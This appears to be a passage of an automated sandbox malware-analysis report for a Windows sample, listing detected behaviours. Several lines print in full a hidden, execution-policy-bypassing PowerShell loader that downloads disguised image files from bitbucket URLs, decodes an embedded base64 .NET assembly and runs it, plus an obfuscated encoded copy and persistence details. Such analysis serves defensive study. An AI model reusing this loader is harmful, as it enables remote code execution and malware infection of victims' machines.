CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcub
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la'
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwB
l#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
        Source: nTHivMbGpg.exe Static PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD211D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6FD211D10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFAACB42A83 push eax; iretd 5_2_00007FFAACB42A89
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFAACB46041 push E85ABD31h; ret 5_2_00007FFAACB460F9
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD2115F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF6FD2115F4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1790
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1369
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5276
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4559
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Check user administrative privileges: GetTokenInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5396 Thread sleep count: 1790 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232 Thread sleep count: 1369 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132 Thread sleep count: 95 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2024 Thread sleep count: 5276 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2024 Thread sleep count: 4559 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344 Thread sleep time: -18446744073709540s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD212034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6FD212034
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD216710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF6FD216710
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD211D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6FD211D10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD218A1E SetUnhandledExceptionFilter,0_2_00007FF6FD218A1E
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD218714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6FD218714

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match; File source: amsi64_2412.amsi.csv, type: OTHER
        Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3724, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: powershell.exe PID: 2412, type: MEMORYSTR
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gg#zwbk#gy#a#bk#gy#zwbk#c8#d#bl#hm#d##v#gq#bwb3#g4#b#bv#ge#z#bz#c8#bgbl#hc#xwbp#g0#yqbn#gu#mg#u#go#c#bn#d8#mq#0#dq#ng#x#dc#mg#x#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#gi#aqb0#gi#dqbj#gs#zqb0#c4#bwby#gc#lwbo#gc#z#bm#gg#z#bm#gc#z##v#hq#zqbz#hq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#g4#zqb3#f8#aqbt#ge#zwbl#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#ygbh#hm#zq#2#dq#t#bl#g4#zwb0#gg#i##9#c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.pngsoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}"
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD211258 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF6FD211258
